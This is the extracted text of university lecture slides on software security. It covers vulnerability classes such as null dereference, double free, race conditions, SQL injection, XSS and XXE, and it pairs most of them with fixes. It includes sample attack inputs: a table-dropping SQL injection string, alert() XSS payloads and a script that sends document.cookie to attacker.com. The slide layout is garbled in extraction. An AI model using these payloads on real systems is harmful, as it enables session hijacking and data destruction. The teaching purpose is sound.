lecture01-2 NEW.pdf

Full Transcript

Systems and Software
Verification Laboratory

Software Security
used by Dr. Bilal Alqudah , AHU

Lucas Cordeiro
Department of Computer Science
[email protected]
 Audience
This course unit introduces students to basic and
advanced approaches to formally build verified
trustworthy software systems

Reliability: deliver services as specified
Availability: deliver services when requested
Safety: operate without harmful states
Resilience: transform, renew, and recover in timely
response to events
Security: remain protected against accidental or
deliberate attacks
 Relationship to Other Courses
Software Security involves people and practices, to
build software systems, ensuring confidentiality,
integrity and availability

Cyber-Security
Cryptography
Automated Reasoning and Verification
Logic and Modelling
Agile and Test-Driven Development
Software Engineering Concepts In Practice
Systems Governance
 Cyber-Security Pathway

Cyber-Security

Software Security Cryptography

Build programs that
continue to function System
correctly under Governance
malicious attack Trustworthy
SW Systems
 Intended Learning Outcomes
Explain computer security problem and why broken
software lies at its heart
Explain continuous risk management and how to put it
into practice to ensure software security
Introduce security properties into the software
development lifecycle
Use software V&V techniques to detect software
vulnerabilities and mitigate against them
Relate security V&V to risk analysis to address
continued resilience when a cyber-attack takes place
Develop case studies to think like an attacker and
mitigate them using software V&V
 Syllabus
Part I: Software Security Fundamentals
o Defining a Discipline
o A Risk Management Framework
o Vulnerability Assessment and Management
o Overview on Traffic, Vulnerability and Malware Analysis
 Syllabus (cont.)
Part II: Software Security
o Architectural Risk Analysis
o Code Inspection for Finding Security Vulnerabilities and
Exposures (ref: Mitre’s CVE)
o Penetration Testing, Concolic Testing, Fuzzing, Automated
Test Generation
o Model Checking, Abstract Interpretation, Symbolic
Execution
o Risk-Based Security Testing and Verification
o Software Security Meets Security Operations
 Syllabus (cont.)
Part III: Software Security Grows Up
o Withstanding adversarial tactics and techniques defined in
Mitre’s ATT&CK™ knowledge base
o An Enterprise Software Security Program
 Textbook
McGraw, Gary: Software Security: Building Security
In, Addison-Wesley, 2006
Hoglund, Greg: Exploiting Software: How to Break
Code, Addison-Wesley, 2004
Ransome, James and Misra, Anmol: Core Software
Security: Security at the Source, CRC Press, 2014
 Textbook
Edmund M. Clark Jr., Orna Grumberg, Daniel Kroening,
Doron Peled, Helmut Veith: Model Checking, The MIT
Press, 2018
 Textbook
Edmund M. Clark Jr., Orna Grumberg, Daniel Kroening,
Doron Peled, Helmut Veith: Model Checking, The MIT
Press, 2018
Mark Dowd , John McDonald, et al.: The Art of
Software Security Assessment: Identifying and
Preventing Software Vulnerabilities, Addison-Wesley,
2006

These slides are also based
on the lectures notes of
“Computer and
Network Security” by Dan
Boneh and John Mitchell.
 Software Platform Security

https://www.cybok.org/media/downloads/cybok_version_1.0.pdf
SEI CERT C Coding Standard: Rules for
Developing Safe, Reliable, and Secure
Systems
Computer Emergency Response Team

https://resources.sei.cmu.edu/downloads/secure-coding/
assets/sei-cert-c-coding-standard-2016-v01.pdf
 The CERT Division
CERT’s main goal is to improve the security and
resilience of computer systems and networks

Computer Emergency Response Team
https://www.sei.cmu.edu/about/divisions/cert/
 Intended Learning
Outcomes
Define standard notions of security and use
them to evaluate the system’s confidentiality,
integrity and availability
Explain standard software security problems
in real-world applications
Use testing and verification techniques to
reason about the system’s safety and security
 Motivating Example
void main(){
int x=getPassword();
int getPassword() { ifif(x){
(x!=0){
char buf; printf(“Access Denied\n”);
gets(buf); exit(0);
return strcmp(buf, ”SMT”); }
} printf(“Access Granted\n”);
}

What happens if the user enters “SMT”?

On a Linux x64 platform running GCC 4.8.2, an input consisting of 24
arbitrary characters followed by ], , and @, will bypass the
“Access Denied” message

A more extended input will run over into other parts of the computer
memory

Barrett et al., Problem Solving for the 21st Century, 2014.
 What is Safety and Security?
Safety
– If the user supplies any input, then the system
generates the desired output
Any input ⇒ Good output
Safe and protected from danger/harm
More features leads to a higher
verification effort

Security
– If an attacker supplies unexpected input, then the
system does not fail in specific ways
Bad input ⇒ Bad output
Protection of individuals, organizations,
and properties against external threats
More features leads to a higher
chance of attacks
 Overview

System

User Attacker

Security consists of the following basic elements:
– Honest user (Alice)
– Dishonest attacker
– Goal: how the attacker
disrupts Alice’s use of the system (Integrity, Availability)
learns information intended for Alice only (Confidentiality)
Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009.
 Network Security

Network Attacker

System Intercepts and
controls network
communication

User
Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009.
 Web Security

System

Web Attacker

Sets up a malicious
site visited by the
victim; there exists
no control of the
User network

Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009.
 Operating System Security

OS Attacker

Controls malicious
files and
applications

User
Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009.
 CIA Principle

System

User Attacker

Confidentiality: Attacker does not learn the
user’s secrets.
Integrity: Attacker does not undetectably
corrupt system’s function for the user
Availability: Attacker does not keep system
from being useful to the user
Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009.
What does it mean for software to
be secure?
A software system is secure if it satisfies a specified
security objective
§ E.g. confidentiality, integrity and availability
requirements for the system’s data and functionality

Example of Social Networking Service
Confidentiality: Pictures posted by a user can only be seen
by that user’s friends
Integrity: A user can like any given post at most once
Availability: The service is operational more than 99.9% of
the time on average
Security Failure and Vulnerabilities

A security failure is a scenario where the software
system does not achieve its security objective
– A vulnerability is the underlying cause of such a failure
Most software systems do not have precise, explicit
security objectives
– These objectives are not absolute
– Traded off other objectives e.g. performance or usability
Software implementation bugs can lead to a
substantial disruption in the behaviour of the
software
 Intended Learning
Outcomes

Define standard notions of security and use
them to evaluate the system’s confidentiality,
integrity and availability
Explain standard software security problems
in real-world applications
Use testing and verification techniques to
reason about the system’s safety and security
 Software Security
Software security consists of building programs that
continue to function correctly under malicious attack
Software
Requirements Definition
Application Availability services are
accessible if
requested by
Firmware authorized users
Integrity data completeness
OS and accuracy are
preserved
Services Confidentiality only authorized
users can get access
Communication to the data
 Why are there security
vulnerabilities?
Software is one of the sources of security problems
– Why do programmers write insecure code?
Awareness is the main issue

Some contributing factors
– Limited number of courses in computer security
– Programming textbooks do not emphasize security
– Limited number of security audits
– Programmers are focused on implementing features
– Security is expensive and takes time
– Legacy software (e.g., C is an unsafe language)
 Implementation Vulnerability

We use the term implementation vulnerability (or
security bug) both for bugs that
– make it possible for an attacker to violate a security
objective
– for classes of bugs that enable specific attack techniques
The Common Vulnerabilities and Exposures
(CVE) is a publicly available list of entries
– describes vulnerabilities in widely-used software
components
– it lists close to a hundred thousand such vulnerabilities

https://www.cve.org/ https://cve.mitre.org/
 Critical Software Vulnerabilities

Null pointer dereference
double *p = new double();
int main() {! A NULL pointer dereference
double *p = NULL; occurs when the application
int n = 8;!
dereferences a pointer that it
for(int i = 0; i < n; ++i )
*(p+i) = i*2;! expects to be valid, but is
return 0;! *(p+i) =new double() NULL
}

Scope Impact
Availability Crash, exit and restart
Integrity Execute Unauthorized Code
Confidentiality or Commands
Availability
 Critical Software Vulnerabilities

Null pointer dereference
Double free
int main(){! The product calls free()
char* ptr = (char *)malloc(sizeof(char));! twice on the same
if(ptr==NULL) return -1;! memory address,
*ptr = 'a’;!
free(ptr);
leading to modification
free(ptr);! of unexpected memory
return 0;! locations
}

Scope Impact
Integrity Execute Unauthorized Code
Confidentiality or Commands
Availability
 Critical Software Vulnerabilities
if (NULL) {. …..}. X
if (true) {. …..}. OK
Null pointer dereference
if (false) {. …..}. Ok
Double free if (1) {. …..}. Ok
Unchecked Return Value to NULL Pointer
Dereference
The product does
String username = getUserName();! not check for an
if (username.equals(ADMIN_USER)) {!...! error after calling a
} function that can
return with a NULL
pointer if the function
Scope Impact fails
Availability Crash, exit and restart
 Critical Software Vulnerabilities

Null pointer dereference
Double free
Unchecked Return Value to NULL Pointer
Dereference class w{
private:
cin >> x;
Division by zero int w= R/x;
int * ptr;

Missing free int * ptr;
public:
w(){};
….
Use after free free(ptr);
~w(){
delete(ptr);
*ptr=20; XXXX
APIs rule based checking …..
}
ptr= new int(); }
 Race Condition Vulnerabilities

VDU Visual
VDU Display
Unit

VDU VDU

Race conditions
P P P P
occur when
multiple
processes
perform Process
unsynchronized
accesses to the Database
database
 Race Condition Vulnerabilities

Concurrency is an essential subject with importance
well beyond the area of cyber-security
– Prove program correctness

Race condition vulnerabilities are relevant for many
different types of software
– Race conditions on the file system: privileged programs
An attacker can invalidate the condition between the check and action

– Races on the session state in web applications: web
servers are often multi-threaded
Two HTTP requests belonging to the same HTTP session may access the
session state concurrently (the corruption of the session state)
 Web Application Vulnerabilities

https://www.imperva.com/blog/the-state-of-web-application-
vulnerabilities-in-2018/
Vulnerabilities by Categories
 Structured output generation
vulnerabilities
A SQL injection vulnerability is a structured output
generation vulnerability where the structured output
consists of SQL code
– These vulnerabilities are relevant for server-side web app
interact with a back-end database by constructing queries
based on input provided through web forms

A script injection vulnerability, or Cross-Site
Scripting (XSS) vulnerability is a structured output
generation vulnerability
– the structured output is JavaScript code sent to a web
browser for client-side execution
Sub getstudent ( stNO ){
select student from courses where 1=1; drop table student cascade ;-- > 2000 ;
 SQL Injection
https://www.hacksplaining.com/lessons
SQL injection allows an attacker to interfere with the
queries to the database in order to retrieve data

- retrieving hidden data
- subverting application logic
- UNION attacks
- examining the database
- blind SQL injection

https://portswigger.net/web-security/sql-injection
 Example of SQL Injection

A programmer can construct a SQL query to check
name and password as

query = "select * from users where
name=’" + name + "’" and pw = ’" +
password + "’"

However, if an attacker provides the name string, the
attacker can set name to “John’ –”
– this would remove the password check from the query
(note that -- starts a comment in SQL)
 Cross-site Scripting (XSS)

XSS attacks represent injection of malicious scripts
into trusted websites...
Employee ID:

XSS allows attackers to bypass access controls
– If eid has a value that includes source code, then the
code will be executed by the web browser
– use e-mail or social engineering tricks to lead victims to
visit a link to another URL
 XSS
XSS stands for Cross-Site Scripting, which is a type of web security vulnerability that allows
attackers to inject malicious code into a web page viewed by other users.

In an XSS attack, the attacker injects scripts or other code into a web page, which is then
executed by the victim's web browser. This can allow the attacker to steal sensitive
information, such as login credentials, session tokens, or other personal data.

XSS attacks can be classified into two main types: stored (also known as persistent) and
reflected (also known as non-persistent). Stored XSS attacks involve injecting malicious
code into a web page that is then stored on the server and served to all users who visit the
page. Reflected XSS attacks involve injecting code that is then reflected back to the user,
such as in a search field or other input form.

ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
Example of a web page with a Cross-Site Scripting (XSS)
vulnerability in JavaScript
The code allows users to input their name,
which is then displayed in a greeting message
when they click the "Submit" button.

XSS Example However, the script does not properly sanitize
user input, making it vulnerable to a cross-site
scripting attack.
Welcome to my website!
Enter your name below:

Submit An attacker could inject malicious code into

the name input field, such as:
function greet() {
var name = document.getElementById("name").value;
document.getElementById("greeting").innerHTML = "Hello, " alert('You have been hacked!')
+ name + "!";
}

ref: https://www.girlscanhack.com/post/breaking-down-the-
web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 To fix this vulnerability, the code should properly sanitize user input, such as by using :
The FiX A. content security policy or
B. validating input on the server-side before displaying it in the HTML.

we've added a Content Security Policy
XSS Example (CSP) meta tag in the `head` section of the

to only allow resources to be loaded from the
same origin as the website, preventing any
Welcome to my website! external scripts from being loaded.
Enter your name below:

Submit In addition, we've updated the `greet()`

function to sanitize user input before
function greet() { displaying it in the greeting message. We've
var name = document.getElementById("name").value; used the `replace()` method to replace any `` characters in the user input with their
document.getElementById("greeting").innerHTML = "Hello, " +
name + "!"; HTML entity equivalents, `&lt;` and `&gt;`,
} respectively.

ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 XSS can be used by attackers to perform a wide range of
malicious activities, including but not limited to:

1. Stealing sensitive information: An attacker can use XSS to steal sensitive data such as login
credentials, session tokens, and other personal information that may be present on the web page.
2. Session hijacking: Attackers can use XSS to hijack the victim's session by stealing their session
cookies or other session identifiers, which can then be used to impersonate the victim and gain
unauthorized access to their account.
3. Delivering malware: Attackers can use XSS to deliver malware to the victim's computer, which
can then be used to compromise the system, steal sensitive data, or launch further attacks.
4. Phishing: Attackers can use XSS to create convincing phishing pages that trick users into
entering their login credentials or other sensitive information.
5. Defacing websites: Attackers can use XSS to modify the content of a web page, defacing it or
inserting malicious links or code.
6. Creating self-propagating worms: In some cases, attackers can use XSS to create self-
propagating worms that spread automatically to other users who visit the same web page.
ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 Reflected XSS via URL parameter
(PHP) To fix this:
http://example.com/search?q=alert("XSS"); you should validate and sanitize
user input on the server-side. In
this case, you should escape any
special characters that could be
In this example, the q parameter in the URL is used to inject scripts into the
vulnerable to a reflected XSS attack. The attacker HTML. You can use an HTML
injects a script that displays an alert box with the encoding library, like
text "XSS" when the victim clicks on the link. htmlspecialchars(), to do this.

$q = htmlspecialchars($_GET['q'],
ENT_QUOTES, 'UTF-8');
ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 Stored XSS in comment section
(HTML) (PHP)
require_once 'htmlpurifier-
Leave a comment: 4.12.0/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
Submit $comment = $purifier->purify($_POST['comment']);

In this example, the text area field is The Fix :
vulnerable to a stored XSS attack. An you should sanitize user input before storing
attacker could inject a script into the it on the server-side. You can use a library like
comment field, which would be htmlpurifier to remove any malicious scripts
stored on the server and executed in and tags from the user's input.
the victim's browser when they view
ref: https://www.girlscanhack.com/post/breaking-down-the-
the comment section. web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 DOM-based XSS via JavaScript
(HTML) To fix this, you should use proper input

var searchResults = document.getElementById("search- validation and sanitization techniques
results");
var searchTerm = window.location.search.replace("?q=", "");
to prevent user input from being able
searchResults.innerHTML = "Search results for: " + to execute scripts. You can use regular
searchTerm + "";

expressions or input validation libraries
to ensure that the input is safe.
In this example, the searchTerm variable is
(Javascript)
vulnerable to a DOM-based XSS attack. If an var searchTerm = window.location.search.replace("?q=", "");
attacker is able to inject a script into the q if (/^[a-zA-Z0-9]+$/.test(searchTerm)) {
parameter in the URL, it will be executed when searchResults.innerHTML =
"Search results for: " + searchTerm + "";
the JavaScript code modifies the content of the } else {
searchResults element. searchResults.innerHTML = "Invalid search term.";
ref: https://www.girlscanhack.com/post/breaking-down-the-
}
web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 Stored XSS in form field
(HTML)
To fix this, you should escape and sanitize
Username: user input before storing it on the server-

side. You can use an HTML encoding
Password:
library, like htmlspecialchars(), to do this
Login

(PHP)
In this example, the username field is vulnerable $username =
htmlspecialchars($_POST['username'],
to a stored XSS attack. An attacker could inject a ENT_QUOTES, 'UTF-8');
script into the username field, which would be
stored on the server and executed in the victim's
browser when they log in.
ref: https://www.girlscanhack.com/post/breaking-down-the-
web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 Session hijacking via cookie stealing
(HTML)
var cookie = document.cookie; To fix this, you should use secure cookies
var attackerURL =
and HTTPS to prevent session hijacking
"http://attacker.com/steal.php?cookie=" + cookie;
var img = new Image(); attacks. You can set the HttpOnly and
img.src = attackerURL; Secure flags on cookies to prevent them
from being accessed by scripts and to
ensure that they are only transmitted
In this example, an attacker injects a script into over secure connections.
a vulnerable website that steals the victim's
session cookie. The script creates an image
object with the URL of the attacker's server and (PHP)
the victim's session cookie as a parameter. session_set_cookie_params(
When the victim's browser loads the image, the 0, '/', '', true, true);
session cookie is sent to the attacker's server, session_start();
ref: https://www.girlscanhack.com/post/breaking-down-the-
allowing them to hijack the victim's session.
web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
Resources
https://pentest-tools.com/blog/xss-attacks-practical-scenarios
to Practice https://github.com/digininja/DVWA
Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html
folder or any Internet facing servers, as they will be compromised. It is recommended using a virtual machine
(such as VirtualBox or VMware), which is set to NAT networking mode. Inside a guest machine, you can download
and install XAMPP for the web server and database. Download the website

XSS Attack: 3 Real Life Attacks and Code Examples
https://brightsec.com/blog/xss-attack/
https://www.websentra.com/cross-site-scripting-attacks-guide-examples/
https://owasp.org/www-community/attacks/xss/
ref: https://www.girlscanhack.com/post/breaking-down-the-
web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them
 XML External Entity (XXE) Processing

XXE represents a malicious action against an
application that parses XML input
– XXE occurs when XML input (incl. an external entity) is
processed by a weakly configured XML parser
– XXE might lead to the disclosure of confidential data

]>

&xxe;
mypass